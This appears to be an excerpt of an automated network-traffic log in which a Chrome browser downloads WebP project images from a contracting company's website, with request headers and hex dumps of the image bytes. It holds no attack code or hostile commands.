                                              2024-09-27 06:20:18 UTC8000INData Raw: 96 b4 a9 30 c9 ec 08 76 eb 7f 70 93 7b 72 fd 9d 02 61 1e 98 04 89 fc ec 9d 94 91 2f 18 ed 78 3f 61 38 74 d7 0c 83 cc 22 f8 5d df 10 9c cb da e6 4e 31 b8 37 0b 4b 85 a8 24 a5 ba 5d bd 7e 76 96 7c 5b 4c 46 d6 e6 c0 ea f9 4d dd 2b 3d 64 4f d3 24 ae 75 6a 46 4b a6 c8 e2 97 51 00 b1 29 ba 0b d2 89 4a 70 2d 8f ab e3 bc 87 86 37 8b 8e e8 d1 c2 93 8d e6 63 69 99 20 fd dc 44 97 ba e4 91 51 d8 00 96 71 ea 49 5c c2 5e 59 b9 ab c7 fd 49 31 14 2f 18 68 30 5f 03 72 2c 73 2d bb 15 cb 3d 47 6b bb 11 23 49 02 d6 38 3b 45 38 39 4e e1 94 f5 51 04 d5 d6 46 63 ae e0 b2 0d e5 88 15 44 2a 40 e5 80 4c dc 0f 49 69 21 f0 c2 c9 39 28 fc 88 e9 7c 72 66 ae 85 31 5b 15 9f 7c 53 f8 33 10 d1 70 cf 9b 08 df 1e eb 37 39 d4 c7 f0 a3 25 f0 ce 46 25 53 b8 78 18 2f f2 4c 77 94 54 2a 7c 5e 76
                                              Data Ascii: 0vp{ra/x?a8t"]N17K$]~v|[LFM+=dO$ujFKQ)Jp-7ci DQqI\^YI1/h0_r,s-=Gk#I8;E89NQFcD*@LIi!9(|rf1[|S3p79%F%Sx/LwT*|^v
                                              2024-09-27 06:20:18 UTC8000INData Raw: a9 9a 30 6c ad cf b9 02 b3 3b 81 8e fe e1 5c 3a e0 ef f6 31 b6 11 05 71 4c b7 69 fd f3 54 d7 0d f4 fa a9 66 20 44 2b 36 bc 65 22 ed 89 34 68 0d 96 7f d8 f5 b6 5e 6d 99 1a 0e 48 cb c4 95 d0 9a ef 83 36 ec 81 bc 92 3b 0a 87 45 4c 4c 5b b9 19 c3 d9 b2 c9 e9 0c 4b 1c c0 01 a7 5f c1 ff e2 f5 d0 03 47 f9 bb 5d ba 5b 0e 59 43 10 e7 d3 b5 e0 9e 20 7f 0e 17 09 e3 ef 0a c1 a8 fe b7 0d 0d da 25 49 8b 57 79 fc 6c bd 2c be 2a 8a a8 ac f9 33 99 10 ba 16 04 99 1f b4 f4 e2 e7 bf 65 ff 3b 0f be b1 12 35 95 a5 ba 40 c6 bf 8c 18 56 79 ce 54 80 2f a5 ad 15 66 80 bc 21 69 f9 26 b1 61 49 3a 2e e6 21 cc 13 e5 60 4d ee ea 64 e2 5d 06 6b cb a6 71 42 be e3 43 93 d7 27 bf 9e b1 bd e8 fb 7b c5 1c c0 aa 75 46 05 2e 27 5c 50 e3 41 c0 16 e5 ea a1 9d 05 76 91 58 6d 0b 1d 26 7a e6 ed 41
                                              Data Ascii: 0l;\:1qLiTf D+6e"4h^mH6;ELL[K_G][YC %IWyl,*3e;5@VyT/f!i&aI:.!`Md]kqBC'{uF.'\PAvXm&zA
                                              2024-09-27 06:20:18 UTC8000INData Raw: 5f 8c 0d 9c e8 5a 6c 68 4b 36 29 bf 1a 27 d9 70 ff 66 2e 98 a3 a5 af 67 d6 da b9 f9 9b 75 28 aa 50 31 62 d3 11 5a 84 1a ad 98 5c 19 69 55 32 67 c8 55 9d 5d 78 8a 6b 38 94 a4 df f4 bd ac ce 1d ee a0 f3 d4 ff f7 11 81 41 3e 8f 28 33 32 93 aa 9c 2a 0d 8b 93 0e 3e ef 2c e8 78 78 0a 8d c1 59 3b 5c 0d 4d f9 44 3b 98 09 75 70 11 7a c4 95 0c 4a 6f 3a 24 aa 3e ad 68 20 90 dd 4d 87 1d dc 2e 77 4e 36 96 4b f6 db 94 39 dc cd d3 62 4e aa a3 22 3e 91 bc 50 ea 97 e4 b3 44 2e f7 b5 3c ee 61 13 02 ca 78 b2 4b 65 e6 87 d6 9d 65 a9 11 fe f2 9d 29 66 b6 7e d7 b0 11 76 d6 3b a0 6d fc 72 bb 67 68 6e 72 ad 1b 2b f5 6b 10 7e 94 26 0a 0f 3f 7b d7 f2 24 fe fa 5c 86 ed 58 c6 88 29 57 1b 22 5c 00 4b d8 e0 32 48 ae bb 02 f6 ec ea 34 d7 0d 0a 45 ef d8 24 17 df ae f3 da fe 4c 91 92 53
                                              Data Ascii: _ZlhK6)'pf.gu(P1bZ\iU2gU]xk8A>(32*>,xxY;\MD;upzJo:$>h M.wN6K9bN">PD.<axKee)f~v;mrghnr+k~&?{$\X)W"\K2H4E$LS
                                              2024-09-27 06:20:18 UTC7581INData Raw: 5a 17 f8 7a 87 f0 f4 ab 31 37 0d 2b cc e3 ab 95 b1 b0 4c 2c 3c 26 46 84 ec 0c 45 f4 2a f7 c6 50 6b 81 90 57 09 9a a1 80 6c e9 39 06 9a 0a 5e fc 77 3a c8 8e 9f 4f 61 6d a6 19 1d 42 a5 b2 f7 ea af a5 4e 69 38 f2 80 bb e7 b0 06 7f 1f 44 b0 6d 74 6c 89 87 b6 9d 94 62 47 3c ef 27 a5 63 5a c4 21 45 d1 72 ea 1c d2 11 b0 51 87 39 10 94 fe 78 bc cc 03 ea 48 3c 44 87 81 a8 0c 2b 18 5a df e6 76 54 f3 44 3e e1 d4 f8 20 42 bc f1 13 52 91 d1 0a 8a 77 79 1b 31 d7 0d 60 55 9b f3 13 ed 34 83 1d d9 09 47 2d 7e 29 5a 2b 82 1d c7 0b ea cd ca 7c 6f 76 09 6c 00 54 89 21 01 29 32 bb f0 4d 0f da 03 31 fd 93 bb 20 48 5c ed 4e 91 c0 04 a0 ff 49 64 56 82 6c a0 9e 00 1e cc fb 93 e7 df d2 40 03 15 77 eb 1a 43 48 48 eb 18 10 7b f1 0f 84 53 5c f3 89 eb 80 0f c5 5f 9b 2b cc f7 c1 12 09
                                              Data Ascii: Zz17+L,<&FE*PkWl9^w:OamBNi8DmtlbG<'cZ!ErQ9xH<D+ZvTD> BRwy1`U4G-~)Z+|ovlT!)2M1 H\NIdVl@wCHH{S\_+


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              105192.168.2.465442173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC724OUTGET /uploads/projects/23/c7a29cc2e7fdcacc9c3f5f4ff3bddd5f.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:32:46 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 23822
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 06 5d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 92 5c 00 00 70 8a 03 9d 01 2a cf 04 a3 03 3e e9 70 b2 54 29 26 2a 35 22 30 b9 f2 a0 1d 09 67 2e 1b 10 05 0b 79 07 06 b5 d7 17 dd e5 cb 1b 66 ad 79 c4 1d 05 bb 97 96 07 10 51 e9 79 e9 6f fd ff 68 9d 99 b9 fb 79 1f 74 be f1 be 36 2a 6b ff d2 1d ff 66 54 3f 34 fd f9 ff fd 42 73 e3 f3 0c eb fe 63 bd b7 ff bf 2f fb 93 b7 bc 43 2a fc cf ff 77 a3 8f 9f 7f a9 fb a1 e7 af c0 ef f3 ff 77 ee cd 8e 3f c8 ef 25 fd 83 2c 6d 1e c1 3f ff 4e 87 bf f8 e4 5b ff df 58 7f c7 f4 d3 e9 ee b4 77 ff 9e ac 3e ef 4a ea 7c 15 17 5b 2a 19 08 0a 2a 2e b6 54 32 10 14 54 5d 61 1a 01 be d8 4a 28 79 d7 ee 2f 3f e6 aa 2e b6 54 32 10 14 54 5d 6c a8 64 20 28 a8 c2 d8 d0 6c 20 33 a3 99 5d 36
                                              Data Ascii: RIFF]WEBPVP8XVP8 \p*>pT)&*5"0g.yfyQyohyt6*kfT?4Bsc/C*ww?%,m?N[Xw>J|[**.T2T]aJ(y/?.T2T]ld (l 3]6
                                              2024-09-27 06:20:18 UTC8000INData Raw: 91 0b d1 5b 80 20 ff 6d 35 10 0f fb fe 00 33 5d e4 9f 0d dd 44 45 3c c6 85 49 30 0f 81 4d 26 76 f5 84 c1 69 a9 2f ea e2 7c 4d 0b 11 4a 39 ae 64 a0 43 8b 7d d3 5f ab 4c 88 0a 96 90 20 54 c8 41 93 4d 82 83 b5 70 19 2d 0b 0b 96 07 98 1c 3c 5c 36 f3 39 7b 00 61 d5 88 41 86 89 aa b4 20 81 3e f9 52 14 8d 1a a6 e7 56 86 c6 36 66 fb 8d 4d bd fe d1 dc a8 47 4c c8 ec 9c ec df 79 06 09 27 eb 11 d6 c0 00 00 3a 8c f0 fc b2 32 2a 00 f3 5f 86 4b 14 28 5d 3b 7e e6 ca e3 e7 72 34 fc b8 80 31 1e d4 66 b9 45 eb f7 56 1f ad e8 2a 69 11 4b 6c c3 3c 34 31 ac 22 44 e2 0f ae 72 d8 e7 91 8c 9b c3 5b e2 59 81 9f 7e 10 f2 c3 76 9c 3c 78 58 17 4b b0 9f 8b 55 f7 bb 2a d4 19 4f ee 2f db 7f 77 22 5a 89 79 f8 11 93 2c d8 a9 42 7b cc a9 98 d0 8f c0 00 05 52 2f 36 5e 3d 10 00 1e 67 48 b2
                                              Data Ascii: [ m53]DE<I0M&vi/|MJ9dC}_L TAMp-<\69{aA >RV6fMGLy':2*_K(];~r41fEV*iKl<41"Dr[Y~v<xXKU*O/w"Zy,B{R/6^=gH
                                              2024-09-27 06:20:18 UTC7891INData Raw: c3 8c 85 77 fc fd 51 57 13 ac 63 67 fc 0f 07 14 e1 cb 6e 28 94 46 3e bb 89 93 d7 7f 08 0c c1 27 45 69 ec 23 66 a8 4b 12 bb db 23 da 7d b8 25 06 d3 7f 74 16 43 09 c2 f0 e7 53 e7 e5 4b a3 1a 4f 78 d5 1e 1a 95 fd bc 78 6c 7a 1f 62 e4 7e 08 ea f5 ee 72 e3 5a 2a e5 ea 6a 9c 48 8d 2b a7 d2 fe 12 59 a5 5b 58 30 cc fd c2 ba bc f9 c3 24 eb 97 8e 25 10 fe 8d c1 ce 91 9d a8 7b 4d 46 19 7d d6 6b 44 62 b4 5e cb a5 51 a1 37 44 97 87 14 6c 6a 22 0a 9c ed a1 62 6b 3d ae 7b f7 3d 81 35 a4 2b dc a3 90 a1 8f 7c 8a 08 bf 09 b4 1e ac 8a 85 1a a5 dd 56 8a ba d0 f3 87 4f ea 4a 9f 90 b5 6e 79 fc e7 4b 6f 17 57 08 3e 74 e6 99 10 8b cd 6c 8f 56 7c 30 99 7c ec 2a 13 11 64 01 10 1e d0 69 4f 13 08 06 b4 07 23 bf 94 8a d2 03 aa cb 51 bd 9d 61 d3 55 cc 7a 12 93 45 a3 49 d4 98 2e 66 c8
                                              Data Ascii: wQWcgn(F>'Ei#fK#}%tCSKOxxlzb~rZ*jH+Y[X0$%{MF}kDb^Q7Dlj"bk={=5+|VOJnyKoW>tlV|0|*diO#QaUzEI.f


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              106192.168.2.465443173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC724OUTGET /uploads/projects/33/278721d8625e4718b5b85a64722cc99d.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 12:03:04 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 41254
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 1e a1 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 aa a0 00 00 30 c6 03 9d 01 2a cf 04 a3 03 3e e9 72 b2 53 a9 26 af a8 23 74 69 79 f0 1d 09 67 6e dc a4 5d 1f 0f 72 fb d2 f3 9b b7 c7 df ee 0e f9 e3 78 ec 14 02 88 45 07 96 f2 39 e8 c6 67 02 3f fd b3 4f b1 9f aa 28 57 a3 7e 85 ff cf f6 7d 7c 73 b6 ed cc 34 ff e7 cf e7 ff cf 61 ff f8 7d 3f fd 30 79 6e e8 58 dd 45 f5 ab fe 21 ea 91 e7 c1 eb cd fe ff d7 7b 4e af e9 5e 4e be 95 d8 5f e9 7e f6 9b 78 e0 3f e9 bc 22 fe f9 fc 9f 3c bf e9 f8 6f fc 0f f4 de 70 7b b3 bb 37 98 8f bc d9 91 fe cf 9d 5f ce 74 0f ff a3 ca 47 ed be 8b 3e 93 bf fa fa 05 fd d3 ff 5f ab 67 fc ef dd 71 6d d9 b9 e7 01 fb ae 69 78 35 d9 93 77 49 58 61 e0 05 6b f7 2c a8 ad 7e e5 95 15 af dc b2 a2
                                              Data Ascii: RIFFWEBPVP8XVP8 0*>rS&#tiygn]rxE9g?O(W~}|s4a}?0ynXE!{N^N_~x?"<op{7_tG>_gqmix5wIXak,~
                                              2024-09-27 06:20:18 UTC8000INData Raw: 6a 43 f8 00 00 00 0d a3 32 41 8c a4 02 a7 75 a7 80 02 c0 7a c2 01 95 21 32 68 00 00 00 19 f4 00 ed c0 00 00 00 04 b1 c4 21 36 e0 00 00 11 51 50 04 00 30 7b 6c 36 f1 80 00 00 00 00 28 ea c4 d7 24 00 02 62 a0 c6 e9 28 8d 82 12 75 41 49 dc 76 48 3f b4 d3 5d 00 42 e9 da 88 29 d6 2a 00 0e 65 9d 32 50 64 25 ed 45 35 2d 4b 6b 32 9d 94 a0 79 06 bb 41 fd 00 2f 70 00 00 00 44 60 6f d4 5a 82 1f e4 34 00 00 00 23 e0 0f e5 aa 47 c4 e9 49 b1 cb 07 0a cf 80 00 9e 1e 2a 72 10 0e 2c 07 06 25 ff 74 1a 35 0f e9 d9 3b 01 b3 49 41 20 02 a8 82 94 a1 47 00 d3 fe cd c1 10 00 00 00 00 a8 b0 00 3c b9 7e 81 06 96 89 53 7a de e2 b4 6b 8d 98 a7 f5 5e 96 67 eb fd 2c 81 fd c6 83 bf 57 6c 24 ce 63 1d c2 c7 b6 93 ba 00 01 7b 48 1e 48 00 bd c0 00 01 10 c8 4c 6e aa b7 20 00 00 03 35 e1 48
                                              Data Ascii: jC2Auz!2h!6QP0{l6($b(uAIvH?]B)*e2Pd%E5-Kk2yA/pD`oZ4#GI*r,%t5;IA G<~Szk^g,Wl$c{HHLn 5H
                                              2024-09-27 06:20:18 UTC8000INData Raw: d1 dd 2f 81 69 6a 8b 0c dc 62 aa a5 57 bf 3e c9 90 bd 01 df 97 e0 76 23 3a 13 80 81 e4 34 b6 80 69 7f 48 d1 fe 03 60 1c 7f 59 6f b0 a6 6e ff 3b 35 bd c2 16 eb 72 94 af 2a 2d 85 1b 6d a9 71 6a 72 34 04 5f 6e 14 ba fb 19 ca 79 ab d1 f1 2f 4e f1 5c fb 93 c5 3d ea 9d a0 2f 8c 3e ef ff 67 61 ad 41 88 78 75 b1 66 5c e6 89 1d db a8 73 aa 28 ef f0 b7 0a ba 51 69 68 02 e6 2b 77 cb f0 8a d0 be 83 53 ba b2 e3 70 75 ad 21 7a 0d 7f 35 2d 9a d8 02 18 0e e9 38 3f 40 8c 80 2c de a4 a7 04 a1 9d 30 ec f5 31 3c ac ce 84 4a e8 e1 4e d8 a3 d6 b0 5f 98 e0 ee 2f 8c 1e 0b c9 76 ee b3 d2 84 2f 92 c3 f1 df ab d0 60 4d 1a 99 3e 29 cf ef 3d d3 cc 13 73 de dc 05 96 48 b3 68 44 92 16 a9 b6 0e 2f c3 cb cc 85 24 7b fa 9c 6f eb 17 3c cb cc af c6 b9 c1 b4 85 64 ce 6a cb 62 da ea 73 62 54
                                              Data Ascii: /ijbW>v#:4iH`Yon;5r*-mqjr4_ny/N\=/>gaAxuf\s(Qih+wSpu!z5-8?@,01<JN_/v/`M>)=sHhD/${o<djbsbT
                                              2024-09-27 06:20:18 UTC8000INData Raw: 86 99 5d e7 f5 6c 5c 6c 08 71 f1 48 e8 30 0a 19 7d 31 b7 db 48 5f dd 2c 62 01 88 8e 97 89 61 89 10 12 9e 99 dc 96 2b 32 06 8c 55 35 0c 22 41 5f 4f 94 90 57 81 57 f7 de 9a 74 6f 28 54 5d e8 20 34 cb e2 a8 79 f5 de 93 fb a3 b0 fb dc 75 62 dd 9a 71 16 40 4b 1f 0a 43 61 ff f2 23 dd a8 fb 6a 7b 2a ea ac 3e bb 34 60 a8 08 f3 d1 68 a5 bc 84 ba 91 56 d1 16 b0 c6 e9 40 c8 aa 18 e0 85 97 ba df 40 26 f8 00 ef 7f 35 82 dd f7 f3 cf cf c1 45 80 84 a5 7a b4 b2 dc 6b d4 6f 14 00 22 cf bc 2f 24 6e 3b 7c 3e b0 46 0a a6 60 af fe e5 ed 04 bd f0 7b 48 3a 0b e4 e8 7a 5e b1 3d 53 74 5c 1f 38 6a e5 34 a1 52 86 5e a1 0f c3 e1 bd 7d b6 18 97 d2 9d b6 1d b7 ab c3 91 1a 8d ed 4d 35 3d e4 60 6a 14 d7 74 4d bc 8b 02 76 ca 99 cc 17 b3 01 b8 03 75 8a 37 28 bf dc bd 13 7c c0 90 dc 70 4b
                                              Data Ascii: ]l\lqH0}1H_,ba+2U5"A_OWWto(T] 4yubq@KCa#j{*>4`hV@@&5Ezko"/$n;|>F`{H:z^=St\8j4R^}M5=`jtMvu7(|pK
                                              2024-09-27 06:20:18 UTC8000INData Raw: 15 48 af 98 ae 22 dc d3 32 52 51 3f 2f bb 3e b0 4c 5a 6f d1 9e d1 ac 2c c8 cc b4 94 bb 45 23 7b 5c 3c 11 ac 5e d1 b4 15 99 8b 32 55 0b 1b bf 79 b5 16 6f 46 5c a8 bf 03 ed f3 73 91 c7 a0 88 94 25 9e ce 6f 43 35 c1 83 fd 8e f3 7b fe a3 18 aa 1f 67 71 54 31 75 f5 ca ab 2d 49 6b 21 0c 24 b3 03 11 0e e7 7e a1 b2 a3 bb 0d 0e 7e 5f ff 08 87 9f c8 f1 19 18 cc 63 75 44 2c 21 cd b8 5c 27 1f 9b 7c 32 e8 9f da ba 84 d5 3c 3f 5b 73 e6 1f 3d c7 bc a4 77 80 37 11 ce 39 3d 73 75 24 b4 9c b2 af 83 1c 3d df a3 a2 48 9b 8e 1f 16 a1 f7 ea d5 67 4d 83 e6 65 d9 ba f1 21 f4 e2 9f ce 32 8a 40 9b 48 f4 0e a3 c1 61 34 20 2a fd b6 a6 04 f9 bb 4f 1e b3 b1 3d 51 97 bb bf 81 61 2a 52 d9 0a 61 32 b0 50 58 a0 ea a5 3f e5 60 d4 47 f8 cd 4e 8c f2 1e bd fc 83 b5 b5 ea 68 6e 4d 6c aa 2d 1e
                                              Data Ascii: H"2RQ?/>LZo,E#{\<^2UyoF\s%oC5{gqT1u-Ik!$~~_cuD,!\'|2<?[s=w79=su$=HgMe!2@Ha4 *O=Qa*Ra2PX?`GNhnMl-
                                              2024-09-27 06:20:18 UTC1323INData Raw: 96 3d 9b 92 99 2c 73 7c f4 0f 0a 3f 53 0b 3b 6e 14 e0 1f 8b b4 bc 3a 5f ec 63 f2 3b 41 2c 42 55 cf e0 bb 2b 5d ac 7b bd a8 44 bf 78 c8 b1 50 7e 7a 3b 5e 49 4a 2b 24 b6 b3 e9 b7 2e b1 58 78 13 84 e9 27 60 5a 9f b6 19 dc 44 22 ae ec d2 31 d0 e0 8b 78 25 3d 6b d0 4c bd 1e e7 2e 18 ef 0e 7c 6f 2c 3f 0e 01 46 b9 77 f0 93 19 be 14 6b 46 de 73 61 d4 7a a4 98 62 9b bc 06 cd 3e 10 a2 1e 71 5f de 8e e2 9f 3d 0b 0d d4 29 b6 76 3e ba 10 c4 f2 1c cf 12 25 b1 52 4f 30 7c 5d de 2e 2b 03 f6 ee 4f 82 c3 42 4c 10 46 0f 15 61 ee 90 5f 50 e1 3f b6 ba 8c 6b 48 67 55 a1 14 8c 65 41 bb 06 30 a4 14 bb f8 b0 3e 2f cc f1 62 bf 26 e3 84 ad 0a bc 7d 4d 53 eb a2 6d ef 6c 70 4e 28 75 d5 f5 9a f2 a4 1c 55 42 3a 43 cf d6 ae ce 6f bc 15 6c fa f3 51 9f 70 11 cb 02 3d 57 f5 c8 3f 7e b8 46
                                              Data Ascii: =,s|?S;n:_c;A,BU+]{DxP~z;^IJ+$.Xx'`ZD"1x%=kL.|o,?FwkFsazb>q_=)v>%RO0|].+OBLFa_P?kHgUeA0>/b&}MSmlpN(uUB:ColQp=W?~F


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              107192.168.2.465441173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC724OUTGET /uploads/projects/25/9d9712f45a8ff4b4f837c7761f37a2b1.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:48:34 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 64182
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 ae fa 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 3a fa 00 00 70 c6 04 9d 01 2a cf 04 a3 03 3e e9 70 af 52 a9 26 2e bb a4 f6 aa 1b 70 1d 09 65 6e dc b6 5f 2f 3c fe 1f 11 55 e4 fd e7 20 b8 a2 f5 de 4b ff e3 f3 cf e7 3c ad 3c 6a 63 ff 9e e3 67 37 8e c1 e9 3f ef 79 a1 73 b4 7e 32 e7 66 79 37 be 37 d2 ef 36 e2 21 ec 4f f8 f5 5a c8 0f c7 b3 c7 f8 fe fc 9f fd fd 82 7f 96 f4 c3 f4 3f ea 77 fb 57 44 ff 9c ff 4e 67 ad 9f f5 7e 9b 8f 4c 8f 5a ad 34 9f 9c fe e1 fa 58 fa 1f 5f bf 9a 7d b3 fc df f1 1f e9 7d fc 7f 69 ca 9f cc 7f 93 e6 9f de 2c ef ff 89 fb 63 e3 ff eb ff cc fa 04 7b af cf b7 f5 bf 70 7c 11 b6 6f f9 7f b7 7e c1 7e e1 7e 03 cf 67 f4 bf f7 fa 3b fb ff fb 0f 60 3f 34 bc 25 7f 39 ff af d8 37 f6 37 ac 2f fc
                                              Data Ascii: RIFFWEBPVP8XVP8 :p*>pR&.pen_/<U K<<jcg7?ys~2fy776!OZ?wWDNg~LZ4X_}}i,c{p|o~~~g;`?4%977/
                                              2024-09-27 06:20:18 UTC8000INData Raw: a4 25 1a 82 96 eb 14 a6 58 84 7f 3b 45 76 8a 56 f3 49 16 f0 59 70 d3 1e 05 26 b3 24 d0 2b 41 c7 85 49 cb b4 ae fc e0 3a 99 5c b2 7a 42 16 0f cd 1b 2b 3e 59 3b 13 9d ad 5f ab 46 0f 49 bb 0a 0d 42 93 91 26 17 25 6c 0c df 9b 13 1b 9b c8 40 d8 fd cb 12 26 ff fa e3 67 5b c2 d2 13 a1 63 47 c0 c2 5b 90 30 6f 3c 9a 03 e7 0d e7 bc 7c 14 da 4c 3b 08 9b 17 27 3e 64 2a ad 00 d2 c4 df 17 c1 9e 4d a6 4d 70 b6 e2 d9 ba 55 83 ff 38 1b 47 3d 99 b0 0a 04 d2 63 10 e7 83 90 d2 83 ee ec 6e d0 3f dc 12 c3 b1 4d c6 a1 ee b1 cf a9 1b 31 b4 49 d9 38 e5 05 57 62 0a 78 f8 fc c7 7d 79 c5 3c 06 bd cb 3e ca bc c7 87 f2 0f 83 80 49 8c 1f 5c 7a 13 e9 f0 ba 6a aa d6 6a dc 1f f9 7d 9e ba 8e 02 36 e3 07 a5 e9 00 b9 8b c3 e3 27 75 27 ea 35 fe 38 d4 f3 9d 0e 2d 9f b4 84 54 2c 6a bc 71 a1 b3
                                              Data Ascii: %X;EvVIYp&$+AI:\zB+>Y;_FIB&%l@&g[cG[0o<|L;'>d*MMpU8G=cn?M1I8Wbx}y<>I\zjj}6'u'58-T,jq
                                              2024-09-27 06:20:18 UTC8000INData Raw: 74 eb 31 e6 46 fb 98 43 f3 07 e9 8e 9b cd f6 de cc fb 51 28 c3 a0 cd ba 07 49 f7 18 a4 80 33 2b 8d e8 bc 0a e0 37 f2 88 1a 77 c8 89 b5 83 33 16 c6 b9 d1 e7 78 45 9b 75 70 e2 e8 07 66 7e 31 86 47 e0 8a 6a 26 9a 4f e4 0e 1e 6d 8e 61 89 ef 29 08 c1 fa 73 8b 81 e0 38 de 8a 06 26 b2 31 22 f9 b3 4e c4 97 15 1f 90 eb c6 98 0f 2c 15 08 fe 1c 79 23 8c 45 45 c9 2c 62 ac ea 41 f8 ca 59 f3 2e 19 7d 7d 1d 3c a4 0a 5e 7c b7 7e 0c 96 f9 50 ad ba 29 84 89 f6 45 8a 50 ac 1f 1a db 2e 14 76 5d fb eb b5 d3 07 39 3d 84 37 cf 6d 99 cf 26 f0 2f f5 24 1f 56 d7 32 d5 79 fb 0c b3 ee 6e 34 f6 19 f0 de d9 98 06 03 72 9c 00 96 77 c5 74 ca dc 33 cc 5a bd b4 fc 77 4e 8e e0 06 f5 d8 52 ca ca 17 6a e3 50 a7 51 05 62 89 11 1f ff 0e 31 a9 e3 f6 3d fb b1 80 37 25 61 21 24 09 6e dd 5d 6e 2a
                                              Data Ascii: t1FCQ(I3+7w3xEupf~1Gj&Oma)s8&1"N,y#EE,bAY.}}<^|~P)EP.v]9=7m&/$V2yn4rwt3ZwNRjPQb1=7%a!$n]n*
                                              2024-09-27 06:20:18 UTC8000INData Raw: d8 2e 79 73 c7 eb e6 5c 18 67 26 22 dd a0 3f db 20 0e 5a f2 34 ba c7 68 57 0b 6b 20 8c 4a 17 d6 7d c3 ab 79 31 96 83 23 9b 3e 2a f0 78 46 a8 2c 24 2d 80 75 9e 38 97 b8 89 07 a4 00 8f 9f 43 b0 4b 13 55 97 e0 dc de 4c cb 9a 42 7b ee ee a3 80 d3 d1 6f 86 4a 02 a2 5e a2 c8 f0 f8 70 03 23 a7 8c 9b 75 5f 39 cf 95 6a f9 71 71 bf 48 17 75 d2 8b 31 b0 fa 51 2f 4e bf 9a cf 98 95 45 29 1b 68 85 9b 91 b7 30 95 a5 25 ff 47 07 d7 3b b3 37 6c 04 a3 c9 1f 48 37 10 f7 bc 3a 70 c3 53 b3 d9 1a f3 c7 ea ec 7f 7b 91 57 19 2d ae b3 f3 89 82 30 42 c2 91 c2 9d 03 7a 33 f7 ca 74 01 18 5f b0 ce 1f 09 ae d9 f6 88 bd a5 90 18 3b 40 a5 a3 4a 95 e7 6b 9b 7a e7 f4 22 bb 4a 32 98 58 b4 27 01 e9 4a a9 74 c5 44 96 b1 7b a6 e3 